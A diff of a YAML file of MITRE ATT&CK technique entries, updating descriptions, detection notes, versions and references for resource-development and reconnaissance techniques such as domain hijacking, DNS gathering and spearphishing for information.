         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54276,15 +54946,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54292,19 +54960,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54338,55 +55006,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -54411,7 +55088,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54427,8 +55104,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -54450,7 +55125,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54466,8 +55141,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -54495,7 +55168,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54511,33 +55184,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -54551,18 +55224,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -54583,7 +55267,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54599,39 +55283,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -54639,13 +55321,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -54670,7 +55380,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54686,8 +55396,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -54709,7 +55417,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54725,8 +55433,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -54752,7 +55458,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54770,13 +55476,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -54832,7 +55536,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -54883,7 +55587,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -54904,7 +55607,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -54920,8 +55623,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -54943,7 +55644,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -54959,8 +55660,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -54982,7 +55681,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -54998,12 +55697,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55043,8 +55740,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
